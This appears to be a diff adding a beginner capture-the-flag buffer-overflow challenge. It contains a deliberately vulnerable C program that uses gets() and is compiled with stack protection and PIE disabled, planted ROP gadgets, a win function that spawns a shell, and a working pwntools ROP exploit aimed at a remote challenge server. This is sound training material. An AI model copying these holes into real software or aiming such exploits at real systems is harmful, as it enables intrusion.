First CTFs

BOF/03_tiny_escape_room/.gdb_history

@@ -0,0 +1,4 @@
+disass vuln
+run
+run
+quit

BOF/03_tiny_escape_room/Makefile

@@ -0,0 +1,10 @@
+CC = gcc
+CFLAGS = -fno-stack-protector -no-pie -O0 -g
+
+all: escape_room
+
+escape_room: main.c
+	$(CC) $(CFLAGS) -o $@ $<
+
+clean:
+	rm -f escape_room

BOF/03_tiny_escape_room/main.c

@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win(int arg1, int arg2) {
+    if (arg1 == 0xdeadbeef && arg2 == 0xcafebabe) {
+        puts("Door unlocked!");
+        system("/bin/sh");
+    } else {
+        printf("Wrong keys: 0x%x, 0x%x\n", arg1, arg2);
+    }
+}
+
+void gadgets() {
+    __asm__("pop %rdi; ret");
+    __asm__("pop %rsi; ret");
+}
+
+void vuln() {
+    char buffer[64];
+    puts("Welcome to the tiny escape room!");
+    puts("Two magic keys open the door.");
+    puts("keys?");
+    gets(buffer);
+}
+
+int main() {
+    setup();
+    vuln();
+    return 0;
+}

BOF/03_tiny_escape_room/solve.py

@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.binary = elf = ELF("./escape_room", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13566)
+# p.recvuntil(b"keys?\n")
+# Your exploit here
+
+var1 = 0xDEADBEEF
+var2 = 0xCAFEBABE
+OFFSET = 72
+# Gadget to overwrite rdi e rsi (pop)
+# (Creati in main.c)
+rdi = 0x401287
+rsi = 0x401289
+ret = 0x40101A
+# win addr
+win = 0x40121B
+payload = flat(
+    b"A" * OFFSET,
+    p64(rsi),
+    p64(var2),
+    p64(rdi),
+    p64(var1),
+    p64(ret),
+    p64(win),
+)
+p.send(payload)
+# p.send(b'cat flag\n')
+# p.recv()
+p.interactive()